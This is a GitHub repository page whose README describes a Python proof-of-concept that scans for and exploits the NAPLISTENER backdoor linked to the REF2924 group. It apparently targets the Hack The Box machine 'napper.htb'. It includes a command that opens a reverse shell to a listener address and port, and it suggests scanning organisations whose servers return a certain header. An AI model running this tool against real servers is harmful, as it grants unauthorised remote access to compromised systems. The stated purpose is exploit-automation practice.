Skip to content

ttate10/REF2924

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits

README.md

README.md

 
 

wmdtc_backdoor.py

wmdtc_backdoor.py

 
 

Repository files navigation

REF2924

NAPLISTENER is a backdoor scanner for the Wmdtc.exe backdoor associated with the REF2924 APT group.

We can use this tool on both Windows and Linux to scan target servers.

If you find the presence of the field [Microsoft HTTPAPI/2.0], within a website's "/" request header, you can try scanning the organization's backdoor.

When running the script for the first time, it will automatically help you download dependent files

SCAN

$ python3 wmdtc_backdoor.py -u "https://napper.htb"

Reverse Shell

$ python3 wmdtc_backdoor.py -u "https://napper.htb" -ip_address 10.10.16.15 -port 10032

image.png

Reference Documentation

About

PoC for the NAPLISTENER exploit: https://www.elastic.co/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph (Purpose: To practice automating exploits)

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages